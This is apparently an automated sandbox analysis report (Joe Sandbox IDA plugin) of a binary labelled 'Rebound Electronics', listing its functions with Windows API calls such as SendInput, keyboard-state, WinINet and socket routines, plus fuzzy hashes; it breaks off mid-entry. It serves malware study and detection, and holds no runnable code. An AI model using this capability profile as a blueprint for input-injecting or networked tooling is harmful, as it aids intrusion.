Opcode Fuzzy Hash: b7adb8be25d4f6fdfc8f2b3a10c6fe963af7de8f784162ff6c5e4ac70ed256da
Instruction Fuzzy Hash: 7E411339600610DFCF11EF15D484A4DBBE5EF99720F198489E946AB7A2CB30ED01EB95

Function 00C8B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C8B5D1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: f0dee65afc272965a17f7d719c0f819fbd8f82ccb2da93b78b9ea65d83574a48
Instruction ID: 03d0339ed7672374ddfdf3dabea060a034042a12a084630c186b7a5a70891c60
Opcode Fuzzy Hash: f0dee65afc272965a17f7d719c0f819fbd8f82ccb2da93b78b9ea65d83574a48
Instruction Fuzzy Hash: A631E174600204BFEF38AF19CC89FAC7B64EB06318F544501FA62D62E1E730AE509B59

Function 00C8D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C8D807
GetWindowRect.USER32(?,?), ref: 00C8D87D
PtInRect.USER32(?,?,00C8ED5A), ref: 00C8D88D
MessageBeep.USER32(00000000), ref: 00C8D8FE

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0dd656549998e55b44cf56dc0818e26e4f669b461a5a844d88c1d1521e376cae
Instruction ID: f8f0da249873edea3b793b4adf1790aaa616144da0f89d598aaa6b85f58f9181
Opcode Fuzzy Hash: 0dd656549998e55b44cf56dc0818e26e4f669b461a5a844d88c1d1521e376cae
Instruction Fuzzy Hash: 01418D70A00258DFCB11EF59D884BAD7BF5FB49319F1981A9E8169F2E0D730E941CB85

Function 00C63A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C63AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C63AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00C63B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C63B92

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 25188fac53d9bded22d7e62ff0f10342824f83264b55e88a93e574517c5de07a
Instruction ID: 63aa0486c28042f148cad08a8f937918591215f7598453c59ea3b095a9a2c971
Opcode Fuzzy Hash: 25188fac53d9bded22d7e62ff0f10342824f83264b55e88a93e574517c5de07a
Instruction Fuzzy Hash: B4315870E00298AFFF308BA4C899BFEBBB59B86310F04011AE492972D1C7748F45D765

Function 00C54004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C54038
__isleadbyte_l.LIBCMT ref: 00C54066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C54094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C540CA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 62076f56a130cb2cc782773425a2708245e8b65c0e622fda3aa0366d40b64637
Instruction ID: 783ba572e21d47ce7ace7f5d1361c02a2002fd6e2f539eb49e7c0016d77973bf
Opcode Fuzzy Hash: 62076f56a130cb2cc782773425a2708245e8b65c0e622fda3aa0366d40b64637
Instruction Fuzzy Hash: 6231F434504205EFDB299F75C844BAA7BB5FF80316F254029EE618B0D1D731D9D4DB94

Function 00C87CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C87CB9

Part of subcall function 00C65F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C65F6F
Part of subcall function 00C65F55: GetCurrentThreadId.KERNEL32 ref: 00C65F76
Part of subcall function 00C65F55: AttachThreadInput.USER32(00000000,?,00C6781F), ref: 00C65F7D

GetCaretPos.USER32(?), ref: 00C87CCA
ClientToScreen.USER32(00000000,?), ref: 00C87D03
GetForegroundWindow.USER32 ref: 00C87D09

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 7982c6ed380b3aa81c4fbcf0aa8ec2c79ed88272c5ff374a281d8ab1e1c61237
Instruction ID: f756bb61fbb36f3768922542642bd3fed881c0ad61c02b5ef2d07b726fd7f739
Opcode Fuzzy Hash: 7982c6ed380b3aa81c4fbcf0aa8ec2c79ed88272c5ff374a281d8ab1e1c61237
Instruction Fuzzy Hash: 6031FF72900108AFDB10EFA5D8859EFBBF9EF58314F118466E815E7211DA319E059BA1

Function 00C8F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

GetCursorPos.USER32(?), ref: 00C8F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C9E4C0,?,?,?,?,?), ref: 00C8F226
GetCursorPos.USER32(?), ref: 00C8F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C9E4C0,?,?,?), ref: 00C8F2A6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: cd63c97afd221ee263140f136a35e8c7e4b8ec6f54f5d32faa04c29a198ccd37
Instruction ID: 1b0d809292f211b3c4967855f0abd568511ef9429c70a1dd0822e841c4fb2e17
Opcode Fuzzy Hash: cd63c97afd221ee263140f136a35e8c7e4b8ec6f54f5d32faa04c29a198ccd37
Instruction Fuzzy Hash: A8219439600018AFCB159F95C858FEEBBB9EF0A714F084069F9064B1A1D3309E51DB64

Function 00C7431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C74358

Part of subcall function 00C743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C74401
Part of subcall function 00C743E2: InternetCloseHandle.WININET(00000000), ref: 00C7449E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 0719eb7d3bac33c31f320d1a81b6c160324d5fc4ff5d7e3cf2d56b12fdcb54eb
Instruction ID: c2e45531e78f0935c04892bbf00d650b07e586368d466ff7a3a03dfc56ceac9c
Opcode Fuzzy Hash: 0719eb7d3bac33c31f320d1a81b6c160324d5fc4ff5d7e3cf2d56b12fdcb54eb
Instruction Fuzzy Hash: 2C21C335200605BFEB199F60DC01FBBB7A9FF45714F10801AFA1ED76A0DB719961AB90

Function 00C78A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00C78AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00C78AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00C78AFF
WSAGetLastError.WSOCK32(00000000), ref: 00C78B16

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: d313b8c2bd9658a9801fe54c39929bf44a266313b653c03cf563e1498eb75531
Instruction ID: 6f9fe3ed09d09778b6d4f16b507b37cb7295cb2e0a98b21d5fb8081bfcea410a
Opcode Fuzzy Hash: d313b8c2bd9658a9801fe54c39929bf44a266313b653c03cf563e1498eb75531
Instruction Fuzzy Hash: 2B21C671A001249FCB149F68DC84B9E7BECEF4A350F008169F84AD7250DB749A44CF90

Function 00C88A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C88AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C88AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C88ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C88ADC

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 1dcc1ce599144a1bd8acdf0bced2d469c735a9a8184c2a3a31078c4e96f1b9d0
Instruction ID: ab7b57592e558650846da091f9bba4beb2e7bae2dc67c1914a03543e70eec012
Opcode Fuzzy Hash: 1dcc1ce599144a1bd8acdf0bced2d469c735a9a8184c2a3a31078c4e96f1b9d0
Instruction Fuzzy Hash: 3811D031205120AFEB18AB18DC05FBE7799AF8A324F144119F827C76E2CB74AD0597A9

Function 00C60AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C61E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C60ABB,?,?,?,00C6187A,00000000,000000EF,00000119,?,?), ref: 00C61E77
Part of subcall function 00C61E68: lstrcpyW.KERNEL32(00000000,?,?,00C60ABB,?,?,?,00C6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C61E9D
Part of subcall function 00C61E68: lstrcmpiW.KERNEL32(00000000,?,00C60ABB,?,?,?,00C6187A,00000000,000000EF,00000119,?,?), ref: 00C61ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C60AD4
lstrcpyW.KERNEL32(00000000,?,?,00C6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C60AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C6187A,00000000,000000EF,00000119,?,?,00000000), ref: 00C60B2E

Strings

cdecl, xrefs: 00C60B25

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 96d1c3465f6b34fbb8e68d6c96931911daa527b941bee6729fe2a0aab22238f8
Instruction ID: 680a299aedd1375617dc6d271fb00a62af8d18ca72368962cd1ee4396dfe1ee6
Opcode Fuzzy Hash: 96d1c3465f6b34fbb8e68d6c96931911daa527b941bee6729fe2a0aab22238f8
Instruction Fuzzy Hash: 7B11D336200305AFDB25AF24DC85E7E77A8FF86314B90806AE906CB260EB71D941D7E0

Function 00C52F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C52FB5

Part of subcall function 00C4395C: __FF_MSGBANNER.LIBCMT ref: 00C43973
Part of subcall function 00C4395C: __NMSG_WRITE.LIBCMT ref: 00C4397A
Part of subcall function 00C4395C: RtlAllocateHeap.NTDLL(01880000,00000000,00000001,00000001,00000000,?,?,00C3F507,?,0000000E), ref: 00C4399F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 975bbd6e20ed9aeda4a2b620b321626cb3a2b2dddd848e2ad80faf82da959cf1
Instruction ID: ffd8d636984c5f2031266a34c80f9fe61d5b763eeb0ddf510d91f2e9fcd88f16
Opcode Fuzzy Hash: 975bbd6e20ed9aeda4a2b620b321626cb3a2b2dddd848e2ad80faf82da959cf1
Instruction Fuzzy Hash: BC11E736509351ABCF313FB0AC8476D3BE4BF513A1F244A25FC5A9A191DB34CAC4A794

Function 00C6058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C605AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C605C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C605DD
FreeLibrary.KERNEL32(?), ref: 00C60632

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: eda69dbdb1ebe59b473a202fabff74f9c85d134255e05112cc7df7a69258b1ad
Instruction ID: 2a41da1c9a775d81b43fe819e824b8691e05052aadd279210f5433b35fef0506
Opcode Fuzzy Hash: eda69dbdb1ebe59b473a202fabff74f9c85d134255e05112cc7df7a69258b1ad
Instruction Fuzzy Hash: 10213A71900219EBDB309F95DCC8ADBBBB8EF40704F208469EA17A6550D770EA55DF50

Function 00C66713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C66733
_memset.LIBCMT ref: 00C66754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C667A6
CloseHandle.KERNEL32(00000000), ref: 00C667AF

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: a2a5ca48a280f77f9da8d225fc9491929c03e6628c1e3353633cd83e9ecc8f09
Instruction ID: ece4678d1195019dfcf293b9ff26ec463ededa4f9430229fee29b930c5614cbd
Opcode Fuzzy Hash: a2a5ca48a280f77f9da8d225fc9491929c03e6628c1e3353633cd83e9ecc8f09
Instruction Fuzzy Hash: CC1106729012287AE7309BA5AC8DFAFBABCEF45724F10419AF505E71D0D2704F80CBA4

Function 00C5B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C5AA79
Part of subcall function 00C5AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C5AA83
Part of subcall function 00C5AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C5AA92
Part of subcall function 00C5AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C5AA99
Part of subcall function 00C5AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C5AAAF

GetLengthSid.ADVAPI32(?,00000000,00C5ADE4,?,?), ref: 00C5B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C5B227
HeapAlloc.KERNEL32(00000000), ref: 00C5B22E
CopySid.ADVAPI32(?,00000000,?), ref: 00C5B247

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 653bdb46a99743314877cab31765162ec976ac1ea97b9e9a2024b81023c7480b
Instruction ID: 7ac8e7eab0c11c3a383ad415f03b22e1fb71bacf5dd524f4549b08d1a1b86404
Opcode Fuzzy Hash: 653bdb46a99743314877cab31765162ec976ac1ea97b9e9a2024b81023c7480b
Instruction Fuzzy Hash: F911C179A00205EFCB049F94DD84BAEBBA9EF85319F14802DE94397251D731AE88DB24

Function 00C5B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C5B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C5B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C5B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C5B4DB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1b665257ceb7b6509e50fc1e2eab24b316ed3f22e41b2aed91553cb353cc46fe
Instruction ID: 143e7a64d81ae856870506a007f79fc54e07a2449942a438a0b8c2d4d1e86efe
Opcode Fuzzy Hash: 1b665257ceb7b6509e50fc1e2eab24b316ed3f22e41b2aed91553cb353cc46fe
Instruction Fuzzy Hash: 80115A7A900218FFDB21DFA9C881F9DBBB4FB08700F204091EA05B7290D771AE50DB94

Function 00C3B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C3B5A5
GetClientRect.USER32(?,?), ref: 00C9E69A
GetCursorPos.USER32(?), ref: 00C9E6A4
ScreenToClient.USER32(?,?), ref: 00C9E6AF

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 1a58981aac832cc32209b67f8a20e930648ef25b46b79a0f191532a762e69c05
Instruction ID: 38cda91f6074ccabf4d1c4d31daebe800a66efbac75cd0a2df3639cf3f00a49e
Opcode Fuzzy Hash: 1a58981aac832cc32209b67f8a20e930648ef25b46b79a0f191532a762e69c05
Instruction Fuzzy Hash: BB110671A10129BBCF10DF94D889AEE77B9EB09304F100455FA12E7150D734AA91DBA5

Function 00C6732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C67352
MessageBoxW.USER32(?,?,?,?), ref: 00C67385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C6739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C673A2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
